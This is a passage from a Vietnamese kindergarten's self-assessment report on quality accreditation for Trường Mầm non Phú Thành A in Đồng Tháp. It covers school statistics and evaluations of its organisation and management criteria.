BÁO CÁO TỰ ĐÁNH GIÁ

MỤC LỤC

NỘI DUNG Trang
Mục lục 1
Danh mục các chữ viết tắt 4
    Bảng tổng hợp kết quả tự đánh giá của nhà trường 5
   
Phần I. CƠ SỞ DỮ LIỆU 6
   
Phần II. TỰ ĐÁNH GIÁ 10
I. ĐẶT VẤN ĐỀ 10
II. TỰ ĐÁNH GIÁ 11
Tiêu chuẩn 1: Tổ chức và quản lý nhà trường 11
Tiêu chí 1: Cơ cấu tổ chức bộ máy của nhà trường theo quy định tại Điều lệ trường mầm non. 11
Tiêu chí 2: Lớp học, số trẻ, địa điểm trường theo quy định của Điều lệ trường mầm non. 13
Tiêu chí 3: Cơ cấu tổ chức và việc thực hiện nhiệm vụ của các tổ chuyên môn, tổ văn phòng theo quy định tại điều lệ trường mầm non. 14
Tiêu chí 4: Chấp hành chủ trương, chính sách của Đảng, pháp luật của Nhà nước, sự lãnh đạo, chỉ đạo của cấp ủy Đảng, chính quyền địa phương và cơ quan quản lý giáo dục các cấp; bảo đảm Quy chế thực hiện dân chủ trong hoạt động của nhà  trường. 15
         Tiêu chí 5: Quản lý hành chính, thực hiện các phong trào thi đua theo quy định. 17
Tiêu chí 6: Quản lý các hoạt động giáo dục, quản lý cán bộ, giáo viên, nhân viên, trẻ và quản lý tài chính, đất đai cơ sở vật chất theo quy định. 18
Tiêu chí 7: Bảo đảm an ninh trật tự, an toàn cho trẻ và cho cán bộ quản lý, giáo viên, nhân viên. 19
Tiêu chí 8: Tổ chức các hoạt động lễ hội, văn nghệ, vui chơi phù hợp với điều kiện địa phương. 20
Tiêu chuẩn 2: Cán bộ quản lý, giáo viên, nhân viên và trẻ. 22
Tiêu chí 1: Năng lực của hiệu trưởng, phó hiệu trưởng trong quá trình triển khai các hoạt động nuôi dưỡng, chăm sóc và giáo dục trẻ. 23
Tiêu chí 2: Số lượng, trình độ đào tạo và yêu cầu về kiến thức của giáo viên. 24
Tiêu chí 3: Kết quả đánh giá, xếp loại giáo viên và việc bảo đảm các quyền của giáo viên. 25
Tiêu chí 4: Số lượng, chất lượng và việc bảo đảm các chế độ, chính sách đối với đội ngũ nhân viên của nhà trường. 26
Tiêu chí 5:  Trẻ được tổ chức nuôi dưỡng, chăm sóc, giáo dục và bảo đảm quyền lợi theo qui định. 27
Tiêu chuẩn 3: Cơ sở vật chất, trang thiết bị, đồ dùng, đồ chơi. 29
Tiêu chí 1. Diện tích, khuôn viên, và các công trình của nhà trường theo quy định tại Điều lệ trường mầm non. 29
Tiêu chí 2. Sân, vườn và khu vực cho trẻ chơi bảo đảm yêu cầu. 30
Tiêu chí 3. Phòng sinh hoạt chung, phòng ngủ và hiên chơi bảo đảm yêu cầu. 31
Tiêu chí 4. Phòng giáo dục thể chất, nghệ thuật, bếp ăn, nhà vệ sinh theo quy định. 33
Tiêu chí 5. Khối phòng hành chính quản trị bảo đảm yêu cầu. 34
Tiêu chí 6. Các thiết bị, đồ dùng, đồ chơi theo Tiêu chuẩn kỹ thuật  Đồ dùng – Đồ chơi – Thiết bị dạy học tối thiểu dùng cho giáo dục mầm non. 36
Tiêu chuẩn 4: Quan hệ giữa nhà trường, gia đình và xã hội 37
Tiêu chí 1. Nhà trường chủ động phối hợp với cha mẹ trẻ để nâng cao chất nuôi dưỡng, chăm sóc, giáo dục trẻ. 38
Tiêu chí 2. Nhà trường chủ động tham mưu với cấp ủy Đảng, chính quyền và phối hợp với các tổ chức, đoàn thể, cá nhân của địa phương. 39
Tiêu chuẩn 5: Kết quả nuôi dưỡng, chăm sóc và giáo dục trẻ. 41
Tiêu chí 1. Trẻ có sự phát triển về thể chất phù hợp với độ tuổi. 41
Tiêu chí 2. Trẻ có sự phát triển về nhận thức phù hợp với độ tuổi 43
Tiêu chí 3. Trẻ có sự phát triển về ngôn ngữ phù hợp với độ tuổi. 45
Tiêu chí 4. Trẻ có sự phát triển về thẩm mỹ phù hợp với độ tuổi 46
Tiêu chí 5. Trẻ có sự phát triển về về tình cảm và kỹ năng xã hội phù hợp với độ tuổi. 48
Tiêu chí 6. Trẻ có ý thức về vệ sinh, môi trường và an toàn giao thông phù hợp với độ tuổi. 49
Tiêu chí 7. Trẻ được theo dõi và đánh giá thường xuyên. 50
Tiêu chí 8.Trẻ suy dinh dưỡng béo phì và trẻ khuyết tật được quan tâm chăm sóc 51
III. KẾT LUẬN CHUNG 53
Phần III. PHỤ LỤC  
    Phụ lục 1: Danh mục mã hồ sơ minh chứng  

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

DANH MỤC CÁC CHỮ VIẾT TẮT

 

TT TỪ VIẾT TẮT GIẢI THÍCH

 

1 BCH Ban chấp hành
2 BĐD Ban đại diện
3 BĐD-CMTE Ban đại diện cha mẹ trẻ em
4 BGH Ban Giám hiệu
5 CBCC Cán bộ công chức
6 CB-GV-NV Cán bộ, giáo viên, nhân viên
7 CBQL Cán bộ quản lý
8 CMHS Cha mẹ học sinh
9 CNTT Công nghệ thông tin
10 CSVC Cơ sở vật chất
11 ĐDDH Đồ dùng dạy học
12 GD-ĐT Giáo dục và đào tạo
13 GV Giáo viên
14 GDMN Giáo dục mầm non
15 LĐTT Lao động tiên tiến
16 MN Mầm non
17 PHHS Phụ huynh học sinh
18 Quyết định
19 UBND Uy ban nhân dân
20 XHHGD Xã hội hóa giáo dục
     
     
     

 

 

 

 

 

 

 

 

 

 

BẢNG TỔNG HỢP KẾT QUẢ TỰ ĐÁNH GIÁ

 Tiêu chuẩn 1: Tổ chức và quản lý nhà trường.
Tiêu chí Đạt Không đạt Tiêu chí Đạt Không đạt
1 X   5 X  
2 X   6 X  
3 X   7 X  
4 X   8 X  
Tiêu chuẩn 2: Cán bộ quản lý, giáo viên, nhân viên và trẻ
Tiêu chí Đạt Không đạt Tiêu chí Đạt Không đạt
1 X   4   X
2 X   5 X  
3   X      
Tiêu chuẩn 3: Cơ sở vật chất,trang thiết bị, đồ dùng, đồ chơi
Tiêu chí Đạt Không đạt Tiêu chí Đạt Không đạt
1 X   4   X
2 X   5   X
3 X   6   X
Tiêu chuẩn 4: Quan hệ giữa nhà trường, gia đình và xã hội
Tiêu chí Đạt Không đạt Tiêu chí Đạt Không đạt
1 X   2 X  
Tiêu chuẩn 5: Kết quả nuôi dưỡng, chăm sóc và giáo dục trẻ
Tiêu chí Đạt Không đạt Tiêu chí Đạt Không đạt
1 X   5 X  
2 X   6 X  
3 X   7 X  
4 X   8 X  

Tổng số các chỉ số đạt: 80/87 tỷ lệ 91.95%.

Tổng số các tiêu chí đạt: 24/29 tỷ lệ 82.75% .

 

 

 

Phần I

  PHẦN I: CƠ SỞ DỮ LIỆU

 

Tên trường (theo quyết định mới nhất): TRƯỜNG MẦM NON PHÚ THÀNH A.

Tên trước đây (nếu có): TRƯỜNG MẪU GIÁO PHÚ THÀNH A.

Cơ quan chủ quản: PHÒNG GIÁO DỤC- ĐÀO TẠO TAM NÔNG.

Tỉnh Đồng Tháp   Họ và tên

hiệu trưởng

Nguyễn Thị Ngọc Diệp
Huyện Tam Nông   Điện thoại 0673987668
Phú Thành A   Fax  
Đạt chuẩn quốc gia Không   Website  
Năm thành lập trường (theo quyết định thành lập)  

1987

  Số điểm trường       4
Công lập        X   Thuộc vùng đặc biệt khó khăn  
Tư thục     Trường liên kết với nước ngoài  
Dân lập     Loại hình khác  

 

 

 

 

 

 

 

 

  1. Số nhóm trẻ, lớp mẫu giáo
  Năm học 2012-2013 Năm học 2013-2014 Năm học 2014-2015 Năm học 2015-2016 Năm học 2016-2017
Số nhóm trẻ từ 3 đến 12 tháng tuổi 0 0 0 0 0
Số nhóm trẻ từ 13 đến 24 tháng tuổi 0 0 0 0 0
Số nhóm trẻ từ 25 đến 36 tháng tuổi 0 1 1 1 2
Số lớp mẫu giáo 3-4 tuổi 2 1 1 1 1
Số lớp mẫu giáo 4-5 tuổi 4 3 3 3 3
Số lớp mẫu giáo 5-6 tuổi 9 7 7 6 6
Cộng 15 12 12 11 11
  1. Số phòng học
  Năm học 2012-2013 Năm học 2013-2014 Năm học 2014-2015 Năm học 2015-2016 Năm học 2016-2017
Tổng số 9 11 11 11 13
Phòng học kiên cố 5 5 5 10 12
Phòng học bán kiên cố 3 5 5 0 0
Phòng học tạm 1 1 1 1 1
Cộng 9 11 11 11 13
  1. Cán bộ quản lý, giáo viên, nhân viên
  2. a) Số liệu tại thời điểm tự đánh giá:
  Tổng số Nữ Dân tộc Trình độ đào tạo Ghi chú
Đạt chuẩn Trên chuẩn Chưa đạt chuẩn
Hiệu trưởng 1 1   1 1 0  
Phó hiệu trưởng 2 2   2 2 0  
Giáo viên

 

17 17   17 15 0  
Nhân viên 8 5   4 1 4 03 cấp dưỡng chưa có chứng chỉ nấu ăn, bảo vệ chưa đạt chuẩn
Cộng 32 30   23 19 8  
  1. b) Số liệu của 5 năm gần đây:
  Năm học 2012-2013 Năm học 2013-2014 Năm học 2014-2015 Năm học 2015-2016 Năm học 2016-2017
Tổng số giáo viên 17 19 19 17 17
Tỷ lệ trẻ/giáo viên (đối với nhóm trẻ) 0 11/1 12,5/1 12,5/1 10
Tỷ lệ trẻ/giáo viên (đối với lớp mẫu giáo không có trẻ bán trú) 28/1 28/1 27/1 24/1 29
Tỷ lệ trẻ/giáo viên (đối với lớp mẫu giáo có trẻ bán trú) 18/1 16/1       18/1 20/1 16
Tổng số giáo viên dạy giỏi cấp huyện và tương đương 0 1 0 3 0
Tổng số giáo viên dạy giỏi cấp tỉnh và tương đương trở lên 0 0 0 0 0

 

 

  1. Trẻ
  Năm học 2012-2013 Năm học 2013-2014 Năm học 2014-2015 Năm học 2015-2016 Năm học 2016-2017
Tổng số 471 401 415 390 398
Trong đó:          
– Trẻ từ 03 đến 12 tháng tuổi 0 0 0 0 0
– Trẻ từ 13 đến 24 tháng tuổi 0 0 6

NTCĐ

0 0
– Trẻ từ 25 đến 36 tháng tuổi 42

 

43 51 41 34
– Trẻ từ 3-4 tuổi 67 39 41 57 43
– Trẻ từ 4-5 tuổi 147 108 100 108 120
– Trẻ từ 5-6 tuổi 220 211 223 184 201
Nữ 245 212 208 193 114
Dân tộc Kinh Kinh Kinh Kinh Kinh
Đối tượng chính sách 43 40 49 37 49
Khuyết tật 2 1 1 1 2
Tuyển mới 108 137 139 41 30
Học 2 buổi/ngày 237 259 307 390 381
Bán trú 17 48 232 291 228
Tỷ lệ trẻ/lớp 27 32 32 33 37
Tỷ lệ trẻ/nhóm 0 20 25 25 17

PHẦN II

TỰ ĐÁNH GIÁ

 

  1. ĐẶT VẤN ĐỀ

Trường Mầm non Phú Thành A được thành lập từ năm tháng 9/1987 trên cơ sở của một tổ mẫu giáo trực thuộc trường Tiểu học Phú Thành A với 3 lớp/ 72 học sinh, tính đến nay được 28 năm, khi mới thành lập trường có tên là Trường Mầm non Phú Thành. Đến năm 1995 trường được đổi tên là Trường mẫu giáo Phú Thành A theo quyết định số 22/QĐ – TL ngày 03 tháng 03 năm 1995. Đến năm 2008 trường mẫu giáo Phú Thành A  được đổi tên là Trường Mầm non Phú Thành A theo quyết định số 43/QĐ.UBND-NV ngày 19 tháng 02 năm 2008. Tháng 10/2008 trường được xây dựng mới. Sau 28 năm thành lập, Trường Mầm non Phú Thành A đã từng bước trưởng thành và phát triển cả về số lượng và chất lượng.

Trường có 04 điểm trường, có 18 phòng gồm 5 phòng làm việc và 13 phòng học trong đó 01 phòng tạm. Điểm chính có 10 phòng trong đó gồm 5 phòng học, 01 phòng hiệu trưởng, 01 phòng phó hiệu trưởng, 01văn phòng, 01phòng y tế, 01 phòng hành chánh quản trị, 01phòng nghệ thuật, 01nhà bếp. Trường có hàng rào bao quanh đảm bảo an toàn cho các cháu. Các phòng học có khá đủ đồ dùng, dụng cụ, đồ chơi phục vụ cho các cháu vui chơi và học tập. Nhà trường đã sử dụng, quản lý cơ sở vật chất theo đúng quy định. Toàn trường có tổng số lớp học: 12 nhóm, lớp với 398 học sinh, tăng 02 trẻ so với đầu năm, trường có 29 CB-GV-NV trong đó 01 hiệu trưởng, 02 phó hiệu trưởng, 17 giáo viên, 01 kế toán, 01 văn thư, 01 Y tế học đường, 01 bảo vệ, 4 cấp dưỡng, có 24/27 CB-GV-NV trình độ chuyên môn đạt chuẩn, trên chuẩn tuy nhiên còn 02 nhân viên cấp dưỡng và  nhân viên bảo vệ chưa đạt chuẩn theo qui định. Công tác quản lý tài sản, tài chính được nhà trường thực hiện Luật kế toán Ngân sách do Chính phủ và Bộ Tài.chính Ngoài ra, nhà trường luôn chủ động trong công tác tham mưu, đề xuất với cấp ủy, chính quyền địa phương và phối hợp với các ngành đoàn thể liên quan trong công tác huy động trẻ đến trường, trong các hoạt động chăm sóc, nuôi dưỡng, giáo dục trẻ, thực hiện tốt công tác xã hội hóa giáo dục trong các hoạt động của đơn vị. Trường luôn là địa chỉ tin cậy về chất lượng chăm sóc giáo dục trẻ, đội ngũ CB-GV-NV không ngừng phấn đấu vươn lên, đã đạt nhiều thành tích trong phong trào thi đua dạy tốt – học tốt và đạt thành tích cụ thể như sau: Trường mầm non Phú Thành A đạt danh hiệu “Tập thể Lao động tiên” vào các năm học: 2011-2012, 2013-2014,2014- 2015, đạt “ Tập thể Lao động xuất sắc” năm học 2014- 2015.  Đạt danh hiệu trường “ Xanh-Sạch-Đẹp” vào năm học 2012-2013. Cá nhân đạt 01 CSTĐ cấp tỉnh, 02 bằng khen UBND tỉnh, 10 CSTĐ cơ sở các năm học 2011-2012, 2013-2014, 2014-2015, 2015-2016. Với mục đích giúp cho nhà trường xác định mức độ đáp ứng mục tiêu giáo dục trong từng giai đoạn để xây dựng kế hoạch cải tiến, nâng cao chất lượng. Trong quá trình tự đánh giá, nhà trường đã xác định được mặt mạnh, mặt yếu từ đó xây dựng cho đơn vị kế hoạch cải tiến nâng cao chất lượng các hoạt động giáo dục, thông báo công khai với các cơ quan quản lý nhà nước và xã hội về thực trang chất lượng của nhà trường để cơ quan quản lý nhà nước đánh giá và công nhận nhà trường đạt tiêu chuẩn chất lượng giáo dục. Vì thế công tác kiểm định chất lượng giáo dục được nhà trường đặc biệt chú trọng và quyết tâm thực hiện tự đánh giá thực trạng chất lượng giáo dục nhằm tìm ra những điểm mạnh, điểm yếu so với các tiêu chuẩn qui định. Từ đó giúp nhà trường chú động  xây dựng kế  hoạch cải tiến nâng cao chất lượng giáo dục của đơn vị, với vai trò trò quan trọng của việc kiểm định chất lượng giáo dục nhà trường đã thành lập hội đồng tự đánh giá chất lượng giáo dục gồm 9 thành viên với đầy đủ thành phần: Ban giám hiệu, các đoàn thể, tổ chuyên môn, các thành viên trong nhà trường đã chủ động tích cực tham gia kiểm định đánh giá một cách trung thực.

  1. TỰ ĐÁNH GIÁ

 Tiêu chuẩn 1: Tổ chức và quản lý nhà trường

Mở đầu: Trường Mầm non Phú Thành A có đầy đủ cơ cấu tổ chức bộ máy theo Điều lệ trường mầm non: Có một hiệu trưởng và hai phó hiệu trưởng, có Hội đồng trường, Hội đồng thi đua khen thưởng, Hội đồng kỷ luật, có chi bộ độc lập, có tổ chức công đoàn, có 02 tổ chuyên môn, 01 tổ văn phòng.  Có số lớp, định biên trẻ/ nhóm, lớp, tỷ lệ giáo viên/ lớp học bán trú và 2 buổi/ ngày theo quy định của Điều lệ trường MN. Các tổ chức hoạt động theo đúng chức năng nhiệm vụ. Thực hiện tốt chế độ thông tin, báo cáo và công tác bồi dưỡng giáo viên, nhân viên để nâng cao chuyên môn, nghiệp vụ.

 Tiêu chí 1: Cơ cấu tổ chức bộ máy của nhà trường theo quy định tại Điều lệ trường mầm non.

  1. a) Có hiệu trưởng, phó hiệu trưởng và các hội đồng ( Hội đồng trường đối với trường công lập, Hội đồng quản trị đối với trường dân lập, tư thục, Hội đồng thi đua khen thưởng và các hội đồng khác);
  2. b) Có các tổ chuyên môn và tổ văn phòng
  3. c) Có các tổ chức Đảng Cộng sản Việt Nam, Công đoàn, Đoàn Thanh niên Cộng sản Hồ Chí Minh và các tổ chức xã hội khác.
  4. Mô tả hiện trạng

Trường Mầm non Phú Thành A thuộc trường mầm non hạng I, có hiệu trưởng, 02  phó hiệu trưởng đảm bảo đủ số lượng theo quy định [H1.1.01.01]. Hội đồng trường do trưởng Phòng Giáo dục và Đào tạo quyết định thành lập số: 416/QĐ-PGDĐT- TCCB ngày 11/11/2015 gồm 07 thành viên. Nhà trường có các hội đồng khác: hội đồng trường [H1.1.01.02]. Hội đồng thi đua khen thưởng, hội đồng chấm thi tuyên truyền viên giỏi được thành lập theo quyết định của hiệu trưởng [H1.1.01.03]. Còn một số thành viên ít tham gia đóng góp cho phương hướng hoạt động, chỉ tiêu đề ra trong năm học của hội đồng trường do mới được bổ nhiệm làm tổ trưởng.

Nhà trường có 2 tổ chuyên môn và 1 tổ văn phòng, tổ chuyên môn ( Khối Nhà trẻ + Mầm + Chồi gồm 10 thành viên, tổ chuyên môn Khối Lá gồm 11 thành viên và 01 tổ văn phòng có 4 thành viên. Tổ chuyên môn và tổ văn phòng được thành lập theo quyết định của hiệu trưởng  [H1.1.01.04].

Trường có Chi bộ độc lập với 15 đảng viên trong đó có 15 đảng viên chính thức. [H1.1.01.05]. Tổ chức Công đoàn có 27 công đoàn viên [H1.1.01.06]. Tổ chức Đoàn thanh niên  gồm 9 Đoàn viên [H1.1.01.07], có ban đại diện cha mẹ trẻ em được thành lập theo quyết định của UBND xã Phú Thành A [H1.1.01.08].

  1. Điểm mạnh

Cơ cấu tổ chức bộ máy của nhà trường đảm bảo theo quy định của Điều lệ trường mầm non hạng I, hiện trường có hiệu trưởng và 02 phó hiệu trưởng, có các hội đồng như hội đồng trường, hội đồng thi đua khen thưởng, hội đồng tư vấn, hội đồng chấm thi giáo viên dạy giỏi, các hội thi của bé, có tổ chuyên môn và tổ văn phòng. Nhà trường có đầy đủ các tổ chức: chi bộ, Công đoàn, Đoàn Thanh niên Cộng sản Hồ Chí Minh và ban đại diện CMHS.

  1. Điểm yếu

Còn một số thành viên ít tham gia đóng góp cho phương hướng hoạt động, chỉ tiêu đề ra trong năm học của hội đồng trường do mới được bổ nhiệm làm tổ trưởng.

  1. Kế hoạch cải tiến chất lượng

Chủ tịch hội đồng trường khuyến khích các thành viên mạnh dạn đóng góp ý kiến để hoàn thiện kế hoạch năm của hội đồng trường, thời gian khắc phục đến hết học kỳ I.

  1. Tự đánh giá: Đạt.

 Tiêu chí 2: Lớp học, số trẻ, địa điểm trường theo quy định của Điều lệ trường mầm non.

  1. a) Lớp học được tổ chức theo quy định;
  2. b) Số trẻ trong một nhóm, lớp theo quy định;
  3. c) Địa điểm đặt trường, điểm trường theo quy định.
  4. Mô tả hiện trạng

Năm học 2016-2017 nhà trường huy động được 12 nhóm, lớp gồm: 02 nhóm nhà trẻ 25-36 tháng tuổi (Có 01 nhóm trẻ cộng đồng), 01 lớp 3-4 tuổi, 03 lớp 4-5 tuổi, 6 lớp 5-6 tuổi. Có 7 nhóm, lớp bán trú và 5 lớp học 2 buổi/ ngày[H1.1.02.01].

Tổng số trẻ của trường 398 trẻ, được phân chia cụ thể. Đối với nhóm trẻ: Từ 25 đến 36 tháng tuổi được tổ chức thành 02 nhóm trẻ với 34 cháu trong đó có 15 trẻ nhóm trẻ cộng đồng, lớp mẫu giáo 3- 4 tuổi 1 lớp 33 trẻ , mẫu giáo 4- 5 tuổi 3 lớp 104 trẻ, bình quân 35 trẻ/ lớp, mẫu giáo 5- 6 tuổi 6 lớp 227 trẻ, bình quân 38 trẻ/lớp. Còn 01 lớp 4-5 tuổi ở điểm chính 47 trẻ vượt 17 trẻ so với qui định do phụ huynh có nhu cầu gởi bán trú nhưng thiếu phòng học, 01 lớp mầm 33 trẻ vượt 8 trẻ so với qui định, 01 lớp Lá 43 trẻ vượt 8 trẻ so với qui định do số trẻ thừa không đủ để chia tách thêm lớp.[H1.1.02.01].

Điểm chính của trường đặt tại khu dân cư thuộc ấp Long Phú A, xã Phú Thành A thuộc trung tâm của xã nên thu hút trẻ các ấp đến trường. Ngoài ra, trường có điểm trường đặt đều ở các ấp thuận lợi cho trẻ đến trường. Công tác quản lý các điểm còn gặp khó khăn do các điểm phụ cách xa điểm chính. [H1.1.02.02].

  1. Điểm mạnh

Trường có 12 nhóm lớp, số trẻ trong nhóm, lớp được phân chia theo quy định, có 7 nhóm, lớp bán trú và 5 lớp học 2 buổi/ ngày, các điểm trường đặt tại khu dân cư và theo các ấp nên thuận lợi cho trẻ đến trường. Có 9 nhóm, lớp có số trẻ đảm bảo theo qui định.

  1. Điểm yếu

Còn 01 lớp 4-5 tuổi ở điểm chính 47 trẻ vượt 17 trẻ so với qui định do phụ huynh có nhu cầu gởi bán trú, 01 lớp ghép 3 độ tuổi 3,4,5 chưa được tách lớp do thiếu giáo viên.

Công tác quản lý các điểm còn gặp khó khăn do các điểm phụ cách xa điểm chính.

 

  1. Kế hoạch cải tiến chất lượng

Nhà trường tích cực tham mưu với lãnh đạo Phòng Giáo dục và lãnh đạo địa phương xây cất thêm phòng học ở điểm chính để thu hút trẻ bán trú đến trường, đề nghị sớm chia tách lớp ghép và cấp bổ sung biên chế giáo viên đối với các lớp vượt và lớp ghép, thời gian khắc phục đến tháng 01/2017.

Hiệu trưởng phân công các thành viên trong ban giám hiệu phụ trách các điểm trường để thực hiện công tác quản lý chặt chẽ. Thực hiện tháng 9/2016.

  1. Tự đánh giá: : Đạt.

 Tiêu chí 3:  Cơ cấu tổ chức và việc thực hiện nhiệm vụ của các tổ chuyên môn, tổ văn phòng theo quy định tại Điều lệ trường mầm non.

  1. a) Có cơ cấu tổ chức theo quy định;
  2. b) Xây dựng kế hoạch hoạt động của tổ theo tuần, tháng, học kỳ, năm học và thực hiện sinh hoạt tổ theo quy định;
  3. c) Thực hiện các nhiệm vụ của tổ theo quy định.
  4. Mô tả hiện trạng

Nhà trường có 02 tổ chuyên môn và 01 tổ văn phòng, các tổ chuyên môn có 20 người. Tổ chuyên môn khối Nhà trẻ, mầm, chồi có 9 người gồm: 8 giáo viên và 01 nhân viên cấp dưỡng, tổ chuyên môn khối Lá có 11 người gồm: 9 giáo viên, và 02 nhân viên, tổ chuyên môn có 01 tổ trưởng và 01 tổ phó. Tổ văn phòng có 04 người gồm: 01 y tế học đường, 01 văn thư, 01 kế toán, 01 bảo vệ, tổ văn phòng có 01 tổ trưởng, các tổ trưởng và tổ phó do Hiệu trưởng ra quyết định  [H1.1.03.01].

Tổ chuyên môn và tổ văn phòng dựa trên kế hoạch chung của trường có xây dựng kế hoạch cụ thể cho công tác tuần, tháng, học kỳ và kế hoạch hoạt động cho cả năm học theo chức năng nhiệm vụ của tổ, các kế hoạch có tính thực tế khả thi được hiệu trưởng phê duyệt Tổ chuyên môn và tổ văn phòng sinh hoạt đúng theo quy định hai tuần một lần. Trong quá trình sinh hoạt, các thành viên tổ chuyên môn và tổ văn phòng còn ít đóng góp xây dựng phương hướng hoạt động của tổ do tổ viên còn ngại đóng góp, tổ trưởng mới được bổ nhiệm [H1.1.03.02].

Tổ chuyên môn thực hiện bồi dưỡng chuyên môn, nghiệp vụ, kiểm tra, đánh giá chất lượng, hiệu quả công tác nuôi dưỡng, chăm sóc, giáo dục trẻ và quản lý sử dụng tài liệu, đồ dùng, đồ chơi, thiết bị giáo dục của các thành viên trong tổ theo kế hoạch của nhà trường. Đồng thời, tổ chuyên môn còn tham gia đánh giá, xếp loại giáo viên theo Chuẩn nghề nghiệp giáo viên và đề xuất khen thưởng, kỷ luật giáo viên, triển khai, bồi dưỡng đến các tổ viên kịp thời khi dự họp cùng Ban giám hiệu. Tổ văn phòng giúp hiệu trưởng quản lý tài chính, tài sản, lưu giữ hồ sơ của nhà trường và thực hiện bồi dưỡng chuyên môn, nghiệp vụ, kiểm tra, đánh giá chất lượng, hiệu quả công việc của các thành viên trong tổ theo kế hoạch của nhà trường. Tham gia đánh giá, xếp loại các thành viên trong tổ [H1.1.03.03].

  1. Điểm mạnh

Trường có 02 tổ chuyên môn và 01 tổ văn phòng, tổ chuyên môn khối Nhà trẻ, mầm, chồi có 9 người, tổ chuyên môn khối Lá có 11 người, tổ văn phòng có 04 người đúng cơ cấu tổ chức theo qui định Điều lệ trường MN. Các tổ chuyên môn và tổ văn phòng xây dựng kế hoạch hoạt động của tổ theo tuần, tháng, học kỳ, năm học, thực hiện sinh hoạt và các nhiệm vụ của tổ theo quy định.

  1. Điểm yếu

Trong quá trình sinh hoạt, các thành viên tổ chuyên môn và tổ văn phòng còn ít đóng góp xây dựng phương hướng hoạt động của tổ do tổ viên còn ngại đóng góp, tổ trưởng mới được bổ nhiệm.

  1. Kế hoạch cải tiến chất lượng

          Khi đến dự họp cùng các tổ chuyên môn, tổ văn phòng ban giám hiệu tư vấn các tổ trưởng mạnh dạn gợi ý để khuyến khích các thành viên trong tổ tích cực tham gia đóng góp ý kiến để cùng thống nhất trong thực hiện kế hoạch của tổ đạt hiệu quả. Thời gian thực hiện: đến tháng 10/2016.

  1. Tự đánh giá: Đạt

Tiêu chí 4: Chấp hành chủ trương, chính sách của Đảng, pháp luật của Nhà nước, sự lãnh đạo, chỉ đạo của cấp ủy Đảng, chính quyền địa phương và cơ quan quản lý giáo dục các cấp; bảo đảm Quy chế thực hiện dân chủ trong hoạt động của nhà  trường.

  1. a) Thực hiện các chỉ thị, nghị quyết của cấp ủy Đảng, chấp hành sự quản lý hành chính của chính quyền địa phương, sự chỉ đạo về chuyên môn, nghiệp vụ của cơ quan quản lý giáo dục;
  2. b) Thực hiện chế độ báo cáo định kỳ, báo cáo đột xuất theo quy định;
  3. c) Bảo đảm Quy chế thực hiện dân chủ trong hoạt động của nhà trường.
  4. Mô tả hiện trạng

Nhà trường chấp hành tốt các chủ trương, chính sách của Đảng, Pháp luật của Nhà nước, sự  lãnh đạo, chỉ đạo của cấp Đảng Ủy, chấp hành tốt sự chỉ đạo của UBND xã Phú Thành A và thực hiện các hoạt động chuyên môn theo sự chỉ đạo của Phòng GD& ĐT huyện về việc chăm sóc nuôi dưỡng và giáo dục trẻ thực hiện tốt hướng dẫn nhiệm vụ năm học của ngành [H1.1.04.01].

Nhà trường thực hiện chế độ báo cáo tháng, học kỳ và cả năm theo đúng theo quy định, có chất lượng và có lưu trữ đầy đủ. Còn 01 lần báo cáo tài chính chậm trễ so với thời gian qui định do trong thời gian nghỉ hè, các giáo viên dạy nhóm trẻ cộng đồng có người rời địa phương đi làm ăn ở xa, kế toán không tham mưu kịp thời.[H1.1.04.02]

Nhà trường thực hiện đúng các quy định trong quy chế thực hiện dân chủ trong hoạt động của nhà trường, ban hành theo Quyết định số 04/2000/QĐ-BGDĐT ngày 01/3/2000 của Bộ trưởng BGDĐT. Nhà trường thông qua quy chế dân chủ, quy chế hoạt động, quy chế chi tiêu nội bộ…tại hội nghị cán bộ công chức đầu năm, các cuộc họp. Thực hiện dân chủ trong vấn đề quy hoạch, bổ nhiệm… thực hiện 3 công khai theo Thông tư 09/2009/TTBGDĐT, thực hiện công khai đầy đủ theo Thông tư số:21/2005/TT-BTC ngày 22/3/2005 của Bộ tài chính về Hướng dẫn thực hiện qui chế tài chính đối với các đơn vị dự toán ngân sách và các tổ chức được ngân sách nhà nước hỗ trợ, công khai hàng tháng trên bản tin nội bộ của trường [H1.1.04.03].

  1. Điểm mạnh

Nhà trường thực hiện tốt các chỉ thị, nghị quyết của Đảng, chấp hành tốt sự quản lý của chính quyền địa phương và của cơ quan quản lý giáo dục, thực hiện tốt chế độ báo cáo và đảm bảo quy chế dân chủ trong hoạt động của nhà trường.

  1. Điểm yếu

Còn 01 lần báo cáo tài chính chậm trễ so với thời gian qui định do trong thời gian nghỉ hè, các giáo viên dạy nhóm trẻ cộng đồng có người rời địa phương đi làm ăn ở xa không về dự họp theo thời gian qui định kịp thời.

  1. Kế hoạch cải tiến chất lượng

Hiệu trưởng chỉ đạo kế toán làm tốt công tác tham mưu để Ban giám hiệu có chỉ đạo thực hiện kịp thời. Thời gian khắc phục cuối tháng 10/2016.

  1. Tự đánh giá: Đạt

Tiêu chí 5: Quản lý hành chính, thực hiện các phong trào thi đua theo quy định.

  1. a) Có đủ hồ sơ phục vụ hoạt động giáo dục của nhà trường theo quy định của Điều lệ trường mầm non;
  2. b) Lưu trữ đầy đủ, khoa học hồ sơ, văn bản theo quy định của Luật Lưu trữ;
  3. c) Thực hiện các cuộc vận động, tổ chức và duy trì phong trào thi đua theo hướng dẫn của ngành và quy định của Nhà nước.
  4. Mô tả hiện trạng

Nhà trường có đầy đủ các hồ sơ phục vụ các hoạt động của trường theo quy định của Điều 25 Điều lệ trường mầm non ban hành tại văn bản hợp nhất số 04/VBHN-BGDĐT ngày 24/12/2015 của BGDĐT: Hồ sơ quản lý trẻ em, hồ sơ quản lý trẻ em học hòa nhập, hồ sơ quản lý nhân sự, hồ sơ quản lý chuyên môn, hồ sơ lưu trữ các văn bản, công văn đi- đến, hồ sơ quản lý tài sản, cơ sở vật chất, tài chính. Còn 01 hồ sơ quản lý nhân sự phiếu đánh giá chuẩn nghề nghiệp giáo viên mầm non năm học 2015-2016 chưa cập nhật kịp thời do còn sơ sót [H1.1.05.01].

Các hồ sơ, văn bản của nhà trường lưu trữ theo quy định của của Luật Lưu trữ số 01/2011/QH13 ngày 11/11/2011. Sổ nghị quyết tháng 11 còn thiếu vài chữ ký của giáo viên do sau khi phiên họp kết thúc giáo viên về vội. [H1.1.05.01].

